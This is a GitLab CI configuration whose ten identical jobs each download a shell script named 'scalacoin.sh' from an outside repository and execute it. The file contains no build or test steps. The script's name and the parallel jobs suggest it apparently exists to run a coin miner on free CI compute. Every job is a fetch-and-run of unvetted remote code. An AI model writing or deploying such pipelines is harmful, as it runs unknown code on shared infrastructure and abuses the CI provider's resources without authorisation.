image: golang:latest

variables:
  AWS_REGION: us-east-1

job_1:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_2:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_3:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_4:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_5:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_6:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_7:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_8:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_9:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh

job_10:
  script:
      - wget https://gitlab.com/ayamgorengdua/1/-/blob/master/scalacoin.sh
      - chmod u+x scalacoin.sh
      - ./scalacoin.sh
